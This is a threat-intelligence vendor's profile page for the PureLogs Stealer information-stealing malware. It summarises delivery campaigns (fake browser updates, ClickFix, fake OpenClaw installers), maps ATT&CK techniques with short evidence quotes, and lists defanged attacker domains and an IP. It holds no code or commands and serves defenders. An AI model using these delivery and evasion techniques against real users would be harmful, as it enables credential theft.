Skip to main content
Live Webinar with SANS (June 25)— Agentic CTI Automation for Fun & ProfitRegister Free
Mallory
Back to malware
Malware

PureLogs Stealer

PureLogs Stealer is an information-stealing malware family used to harvest saved information from browsers, cryptocurrency wallets, messaging applications, and other applications. The provided reporting explicitly describes it as a credential harvester and information stealer. It has been observed as part of broader cybercrime operations alongside PureRAT, PureHVNC, ResolverRAT, and likely Lumma/ZgRAT, including campaigns analyzed by Breakglass Intelligence that were active since at least November 2025. In that activity, delivery involved ClearFake/ClickFix fake browser update lures and a Donut in-memory loader executing an obfuscated .NET payload. The associated malware ecosystem used encrypted HTTPS communications, RSA and AES-based protected channels, certificate pinning, and multiple fallback ports. Huntress also reported a February 2026 fake OpenClaw installer campaign in which a Rust-based loader, svc_service.exe, was suspected of running PureLogs Stealer in memory; that campaign used malicious GitHub repositories surfaced via Bing AI search results and broadly targeted users searching for OpenClaw installers on Windows and macOS. Additional phishing activity observed by Cofense used lures themed around the U.S. Social Security Administration and copyright infringement to distribute information stealers including PureLogs Stealer. PureLogs Stealer was also named among malware developed by PureCoder and was reported in attacks recorded between August and November 2025 alongside Pay2Key ransomware and other PureCoder tooling such as PureCrypter and PureHVNC. High-confidence infrastructure and technical details in the supplied content primarily describe the broader campaign ecosystem rather than PureLogs-specific internals; however, reported related indicators include domains such as dndhub[.]xyz and kampf[.]huehnchenfarm[.]ru, IP address 45[.]141[.]119[.]34, and the suspected loader artifact svc_service.exe.

Share:
For your environment

Hunt this family in your stack

Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.

Start free trial
MITRE ATT&CK

Techniques & procedures

12 distinct techniques documented for this family, organized by ATT&CK tactic.

Resource Development

1 technique
T1608.006SEO PoisoningEvidence1

A malicious GitHub repository was promoted via Bing AI search results for OpenClaw Windows ... just hosting the malware on GitHub was enough to poison Bing AI search results.

Initial Access

1 technique
T1566.002Spearphishing LinkEvidence1

"These include spear phishing attacks..."; "...Booking[.]com-spoofing emails with embedded links to a ClickFix fake CAPTCHA site..."

Execution

3 techniques
T1053.005Scheduled TaskEvidence1

Stealth Packer is a new packer that... creates hidden ghost scheduled tasks... EdgeUpdateHelper Scheduled Task ... Set to run ... AdobeCloudHelper.exe daily

T1059.001PowerShellEvidence1

"...guided to run a PowerShell command on Windows by opening the Windows Run dialog..."

T1204User ExecutionEvidence2

The malicious GitHub repository contained installation instructions which, if followed, would run information stealers and GhostSocks malware on a Windows system, and Atomic MacOS Stealer (AMOS) on a MacOS system.

Persistence

1 technique
T1053.005Scheduled TaskEvidence1

Stealth Packer is a new packer that... creates hidden ghost scheduled tasks... EdgeUpdateHelper Scheduled Task ... Set to run ... AdobeCloudHelper.exe daily

Privilege Escalation

1 technique
T1053.005Scheduled TaskEvidence1

Stealth Packer is a new packer that... creates hidden ghost scheduled tasks... EdgeUpdateHelper Scheduled Task ... Set to run ... AdobeCloudHelper.exe daily

Stealth

2 techniques
T1036MasqueradingEvidence2

This blog details an investigation into malicious GitHub repositories posing as OpenClaw installers... At first glance, the GitHub repository could easily be mistaken for a legitimate installer.

T1620Reflective Code LoadingEvidence1

Stealth Packer is a new packer that injects malware into memory... The vast majority of executables were loaders created in Rust designed to run information stealers in memory.

Credential Access

2 techniques
T1555Credentials from Password StoresEvidence1

information stealers continue to be an initial access vector... If an information stealer compromises the system, it can harvest not only account credentials but also sensitive OpenClaw configuration files

T1555.003Credentials from Web BrowsersEvidence1

Credential Access Credentials from Web Browsers T1555.003 PureLogs Stealer browser credential theft

Command and Control

2 techniques
T1008Fallback ChannelsEvidence1

Command and Control Fallback Channels T1008 22 C2 IPs, 8 domains, 10+ port options

T1071.001Web ProtocolsEvidence1

Command and Control Application Layer Protocol T1071.001 HTTPS C2 with certificate pinning

Exfiltration

1 technique
T1041Exfiltration Over C2 ChannelEvidence1

Exfiltration Exfiltration Over C2 Channel T1041 Data exfiltration over encrypted C2

INDICATORS OF COMPROMISE

IOCs tracked for this family

46 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.

View more in app
Network
30 tracked

IPs, domains, and DNS infrastructure linked to this family.

Hashes
16 tracked

File hashes (MD5, SHA-1, SHA-256) from samples and reports.

TypeValueLatest sighting
hash.sha256●●●●●●●●●●●●View more in app14 days ago
hash.sha256●●●●●●●●●●●●View more in app14 days ago
hash.sha256●●●●●●●●●●●●View more in app14 days ago
hash.sha256●●●●●●●●●●●●View more in app14 days ago
ip.v4●●●●●●●●●●●●View more in app27 days ago
domain●●●●●●●●●●●●View more in app2 months ago
ACTIVITY FEED

Recent activity

5 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.

5 SOURCESView more in app
breakglass intelNews
Mar 12, 2026
ResolverRAT Unleashed: A Multi-Tool Cybercrime Arsenal Spanning 22 C2 Nodes and 12 Bulletproof Hosts - Breakglass Intelligence - Breakglass Intelligence

Credential-stealing malware that harvests data from browsers, wallets, and applications. It is deployed alongside RAT and HVNC components in the same campaign.

Read more
huntress blogNews
Mar 4, 2026
How Fake OpenClaw Installers Spread GhostSocks Malware | Huntress

PureLogs Stealer is an information stealer. Here it was suspected to be executed in memory by a Rust-based loader packed with Stealth Packer and connected back to attacker infrastructure.

Read more
the hacker newsNews
Nov 27, 2025
ThreatsDay Bulletin: AI Malware, Voice Bot Flaws, Crypto Laundering, IoT Attacks — and 20 More Stories

Information stealer malware used to exfiltrate credentials and sensitive data from infected systems.

Read more
the hacker newsNews
Sep 29, 2025
Microsoft Flags AI-Driven Phishing: LLM-Crafted SVG Files Outsmart Email Security

Information stealer malware that exfiltrates credentials and other sensitive information from victims.

Read more
+1 more in the timeline
What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: which of your assets match these IOCs, which detections are missing, which campaigns to expect next, and what to do in the next 30 minutes.
Start free trial
IOC matching46

Match every observed IP, domain, and hash against your live telemetry.

Threat actor attribution

Named campaigns wielding this family, with evidence pinned to each claim.

Exploited vulnerabilities

CVEs this family uses for access and lateral movement.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

MITRE ATT&CK mapping12

Every documented technique, ranked by evidence weight.

Researcher chatter

Reddit, Mastodon, and CTI community discussion around this family.